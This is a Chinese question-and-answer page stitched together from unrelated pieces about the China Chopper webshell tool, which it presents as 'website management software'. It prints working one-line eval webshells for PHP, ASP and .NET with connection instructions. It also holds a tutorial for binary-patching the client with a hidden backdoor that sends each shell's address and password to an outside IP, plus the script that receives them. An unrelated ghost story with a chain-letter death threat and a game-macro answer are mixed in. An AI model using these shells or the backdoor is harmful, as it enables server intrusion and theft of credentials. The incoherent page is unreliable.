腳本菜刀
『壹』 中國菜刀是什麼軟體
中國菜刀是一款專業的網站管理軟體,用途廣泛,使用方便,小巧實用。
只要支持動態腳本的網站[如php/jsp/aspx/asp/cfm/ruby/cgi/python/perl等等],都可以用中國菜刀來進行管理!
常用功能:
文件管理,虛擬終端,資料庫管理。
其它功能:
WEB瀏覽器(POST瀏覽/自定義COOKIE瀏覽/自定義JS)
網站爬行(自動保存目錄結構)
網站安全掃描。
在非簡體中文環境下使用,自動切換到英文界面。
『貳』 菜刀怎麼cookie欺騙進後台
做個模擬器樣的腳本。
模擬是對真實事物或者過程的虛擬。模擬要表現出選定的物理系統或抽象系統的關鍵特性。模擬的關鍵問題包括有效信息的獲取、關鍵特性和表現的選定、近似簡化和假設的應用,以及模擬的重現度和有效性。可以認為模擬是一種重現系統外在表現的特殊的模擬。
模擬在計算機體系中的概念:
模擬:用軟體的方法在一台現有的計算機(稱為宿主機)上實現另一台計算機(稱為虛擬機)的指令系統。
『叄』 如何分析中國菜刀是否包含後門
用途廣泛,使用方便,小巧實用。只要支持動態腳本的網站,都可以用中國菜刀來進行管理!在非簡體中文環境下使用,自動切換到英文界面。UINCODE方式編譯,支持多國語言輸入顯示。
『肆』 仙境傳說台服腳本怎麼用的呢
就是幾個月前的事兒。有一個小孩兒,他爸爸媽媽晚上都出去了,就他一個人在家。由於那個小孩兒也不信什麼鬼呀神呀的,所以也不害怕。這就是「心裡沒鬼怕什麼?」到了晚上十一點多了,他爸爸媽媽還沒回來,他開始有點擔心。結果一給他爸爸媽媽打電話,電話筒里傳出來的,卻是「您的的電話是空號,請查詢後再撥······」那個小孩兒很害怕,就報了警。結果不知道怎麼回事,他家的電話突然著火了。那個小孩兒大叫,往外跑,結果們也鎖了。他絕望的看著牆壁。
「嚇死我了!」那個小孩兒醒過來,發現自己在做夢。這是,一個女的拿來毛巾,給他擦了擦汗。然後那個小孩兒倒頭就睡。正當閉上眼睛的那一霎那,回想起那個女的,突然想起那個女的沒有眼睛,眼眶裡是漆黑的,臉上也留著血,臉色慘白。他大叫一聲:「啊!救命啊,快來人呀!」他開始往門外跑,結果門真的鎖了,他去廚房拿起菜刀,就像那個女的砍去,結果菜刀把那個女的一截兩半,然後那個女的有復原了。伸出指甲里都是血的手,向那個小孩兒抓去。
此時此刻,你千萬別看你的後面,因為,用肉眼是看不到的!如果你不把這篇帖子復制發給3個人,凌晨四點,你將會死於非命······
『伍』 中國菜刀的簡介:
產品名稱:中國菜刀,不是原來切菜做飯的道具,而是一款專業的網站管理軟體,用途廣泛,使用方便,小巧實用。只要支持動態腳本的網站,都可以用中國菜刀來進行管理!程序大小:214K,在非簡體中文環境下使用,自動切換到英文界面。UINCODE方式編譯,支持多國語言輸入顯示。
--------------------------------------------------------------------------免責申明:請使用者注意使用環境並遵守國家相關法律法規!由於使用不當造成的後果本廠家不承擔任何責任!--------------------------------------------------------------------------
『陸』 如何使用JSP一句話木馬和菜刀木馬
你好,
一句話木馬分為客戶端和服務端,服務端就是你要傳到網站上的,只有一句話代碼的那個腳本,傳上去後記住地址,然後本地打開客戶端,填上你的一句話木馬地址和密碼,連接就可以了,推薦用中國菜刀,官網地址www.maicai.com
希望回答對您有幫助.
『柒』 如何給中國菜刀添加隱蔽後門
1、後門如何觸發
這里要先講下菜刀的後門是如何觸發的,知道如何觸發後門,後面按這個思路往下看會方便些。
當一句話連回目標伺服器時,我們經常會在文件列表中右鍵查看文件,如下圖
當我們執行右鍵-編輯文件時,我們的後門就會被觸發(我們要添加的就是這樣的一個隱藏後門)。
2、菜刀脫殼
在分析菜刀前,先把菜刀的殼脫掉,使用Peid可知,菜刀是UPx殼,網上找個Upx的脫殼工具即可脫殼。
3、查看數據包,分析流程(右鍵-編輯)
本地搭建好環境後,在菜刀中右鍵-編輯查看某一文件,使用burpsuite進行抓包,
數據如下
a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=%w8LSIpO2RpZSgpOw%3D%3D&z1=%3D%3D
一共有3個參數,
a url解碼後為@eval (base64_decode($_POST[z0]));
z0先url解碼,在base64解碼為
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
Z1先url解碼,在base64解碼為
C:\\wamp\\www\\robots.txt
稍微熟悉php的人應該能看出來,這段代碼就是一個讀文件的php腳本,由菜刀發送到目標伺服器上,然後在目標伺服器上執行的。 既然代碼作為字元串發送帶目標伺服器上,那我我們可以再字元串上添加我們想執行的代碼,由菜刀一起發送過去執行。
if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?cai='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}
如果我們將上這段代碼作為字元串,發送到服務端執行,我們就能獲得webshell的地址和密碼。
4、使用OD分析
使用OD打開中國菜刀,右鍵搜索字元串,結果如下:
定位到php讀取文的字元串處,點擊進去到代碼處
可知,程序時將其作為字元串,壓入棧中作為參數被後續函數處理的,如果在這段字元串後加入我們的後門代碼,就會被程序一塊發送到服務端執行。
5、修改菜刀程序文件
由上可知,字元串的地址為0x49ba94,查看內存數據,
發現其後面已經被他字元串佔用(直接查看原二進制文件結果也是如此),如果我們強制在後面添加後門字元串,就會破壞遠程的某些內容。因此我們需要另外找一個空閑的大空間,將後門代碼放在此處。
這里我們選取地址4841d0h的空間,轉化為文件偏移即為841d0h。
將後門字元串
$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?cai='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}
放到文件841d0處
打開010editor 將上述字元串復制到010editor中,
由於程序中的字元串是雙位元組存放的,這里我們需要將後門代碼也轉化為雙位元組的。010ditor-工具-轉換
使用010editor打開菜刀程序,跳到841d0h偏移處,將轉換後的字元串覆蓋替換菜刀程序中相同大小的數據長度,
保存文件,這樣後門字元串就被我們添加到程序中了。
6、使用OD修改程序代碼
用OD打開菜刀程序,定位到第4步中字元串入棧的代碼處 push 0049bae4。
0049bae4地址是修改前字元串的位置,現在我們將其改成我們添加的字元串的地質處,字元串文件偏移為841d0h,轉化內存偏移為4841d0h,代碼修改如下
保存修改的文件即可。
7、測試修改結果
修改文件後,我們在看看菜刀-右鍵編輯,抓到數據包
Z0解密後為
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?cai='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));};echo("|<-");die();
可見我們的後門代碼也一起被發送到服務端執行了。
編寫加單的getx.php接收結果,
getx.php:
<?php
$getx = $_GET["cai"];
$file = fopen("getx.txt","a+");
fwrite($file,$getx);
fwrite($file,"\r\n");
fclose($file);
?>
結果如下:
8、後記
通過測試可知,對於asp,aspx跟php後門的添加相似,都可以實現。Jsp木馬形式不一,實現添加後門較為困難。另外,由於後門是在服務端執行的,所以不容易被發現,本地抓包是檢測不到後門的;OD中右鍵查看後門地址也是不能直接看到的。
『捌』 「中國菜刀」工具有什麼功能連接到伺服器之前,需要在伺服器上完成什麼事情
摘要 1.中國菜刀支持的服務端腳本:PHP、ASP、asp.net;
『玖』 中國菜刀的功能介紹:
只要支持動態腳本的網站,都可以用中國菜刀來進行管理!主要功能有:文件管理,虛擬終端,資料庫管理。
UINCODE方式編譯,支持多國語言輸入顯示。
一、EVAL客戶端部分
1)要了解的
服務端只需要簡單的一行代碼,即可用此程序實現常用的管理功能。
支持的服務端腳本:PHP, ASP,NET。
在服務端運行的代碼如下:
PHP: <?php @eval($_POST['pass']);?>
ASP: <%eval request(pass)%>
.NET: <%@ Page Language=Jscript%><%eval(Request.Item[pass],unsafe);%>
(注意: .NET要單獨一個文件或此文件也是Jscript語言)
2)怎麼用
在主視圖中右鍵/添加,在彈出的對話框中輸入服務端地址,連接的密碼(請注意上例中的pass字串),選擇正確的腳本類型和語言編碼,保存後即可使用文件管理,虛擬終端,資料庫管理三大塊功能。要是其它都沒錯誤,那麼可能就是你把語言編碼選錯了。
1. 文件管理:[特色]緩存下載目錄,並支持離線查看緩存目錄;
2.虛擬終端:[特色]人性化的設計,操作方便;(輸入HELP查看更多用法)
3.資料庫管理:[特色]圖形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS
以入支持ADO方式連接的資料庫。
(各種腳本條件下的資料庫連接方法請點擊資料庫管理界面左上角處的配置按鈕查看)
注意:由於伺服器的安全設置,某些功能可能不能正常使用。
3) 關於配置信息怎麼填?
A) 資料庫方面:
PHP腳本:
<T>類型</T> 類型可為MYSQL,MSSQL,ORACLE,INFOMIX中的一種
<H>主機地址<H> 主機地址可為機器名或IP地址,如localhost
<U>資料庫用戶</U> 連接資料庫的用戶名,如root
<P>資料庫密碼</P> 連接資料庫的密碼,如123455
ASP和.NET腳本:
<T>類型</T> 類型只能填ADO
<C>ADO配置信息</C>
ADO連接各種資料庫的方式不一樣。如MSSQL的配置信息為
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456
B) 其它方面:
添加額外附加提交的數據:應付這種情況:if ($_POST['action']=='test'){@eval($_POST['pass']);}
<O>action=test</O>
提交功能前先POST額外的數據包:會話期間只提交一次。
<DATA>uid=user1&pwd=123456</DATA>
二、網站蜘蛛
織出一張網站的目錄結構。
下載的列表文件存在桌面,右鍵菜單/載入URL列表即可以根據地址得到目錄結構。
三、定時提醒
當鬧鍾事使吧, 周期:每月/每周/每日/只一次。
四、快速啟動
一些常用的快捷方式放在這里,可以指定用戶身份運行程序。這部分數據是以加密存儲的。
五、瀏覽器
地址欄輸入HELP,更多精彩後續加入。
六、其它部分
等待加入。
附帶工具
update.exe是wsc.exe的資料庫wscdb遷移到菜刀的一個小工具。
把wscdb文件整到當前目錄,運行update.exe得到新的資料庫文件cai.mdb
把菜刀的資料庫db.mdb替換掉即可。
『拾』 按鍵精靈劍靈力士卡刀腳本怎麼做
嚴格來說,按鍵精靈對任何一款網游來說。都屬於外掛。
據我所知,目前暫時還沒有用按鍵精靈卡刀的被封號。
不過卡刀這玩意其實很簡單,沒有特別大的難度。
我也是力士,現在我基本都是手動卡刀。
把削骨快捷鍵改成E,然後毀滅繼續用右鍵不變。需要卡刀的時候,直接狂按E鍵和右鍵就可以了。
擔心還是卡不好的,就直接把Q鍵改成削骨,E鍵改成毀滅。然後交替按就是了。
還是卡不好,直接QE鍵加左右鍵。
不習慣多練練就好。我
我剛開始的時候也不是卡得很順,練多了就成了神器了。
力士不卡刀,不如賣菜刀啊!
好了!有問題再提吧!